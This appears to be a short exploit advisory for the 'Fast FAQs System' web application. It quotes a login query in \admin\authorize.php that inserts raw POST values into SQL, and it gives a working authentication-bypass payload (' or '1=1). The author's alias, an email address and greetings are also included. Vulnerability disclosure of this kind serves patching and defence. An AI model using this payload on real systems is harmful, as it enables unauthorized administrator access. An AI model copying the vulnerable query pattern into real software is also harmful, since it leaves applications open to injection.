Fast FAQs System suffers from a remote SQL injection vulnerability that allows for authentication bypass.
5ef5d90a1af4064c35171657d2b81f54cbb8fad4b4e9dd86ce16946b1985e7d8
########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Email: x0r@live.it
Cms Site: https://fastcreators.com/products/fast_faq/download.php
#########################
Bug In \admin\authorize.php
$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";
Exploit:
' or '1=1
#######################
Greetz: Anna...Strabica...Emetta... Vi Amo..
-- w00t Zone - w00tzone.org